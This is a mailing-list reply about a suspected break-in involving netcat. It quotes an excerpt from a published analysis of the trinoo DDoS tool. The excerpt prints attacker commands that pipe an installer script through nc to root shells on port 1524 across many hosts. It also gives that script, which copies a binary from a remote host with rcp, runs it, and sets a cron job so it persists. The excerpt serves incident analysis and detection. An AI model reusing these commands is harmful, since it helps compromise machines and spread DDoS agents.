RE: Hacked?

Wed, 19 Apr 2000 21:31:58 -0700 

At 08:38 AM 04/18/2000 , you wrote:
>If I understand correctly, it's the equivalent of a cat across a network.
>It is scriptable.  1st off, I didn't install it (not there, anyway)...  The
>scripts that I found in the netcat directory allow it to fire up daemons,
>and all sorts of other stuff..  Unfortunately, I don't understand scripting
>well enough to understand any more than the basics of what was going on
>there.

HI Thomas,

An excerpt from http://staff.washington.edu/dittrich/misc/trinoo.analysis

HTH,

Nikki

5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.

This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:

---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
 . . .

---------------------------------------------------------------------------

The script "trin.sh", whose output is being piped to these systems,
looks like:

---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------

Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily.  If cron is not used at all
by this user (usually root), it may not be detected at all.

----------------------------------------------------------------------------

Nikki


-- 
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.

Reply via email to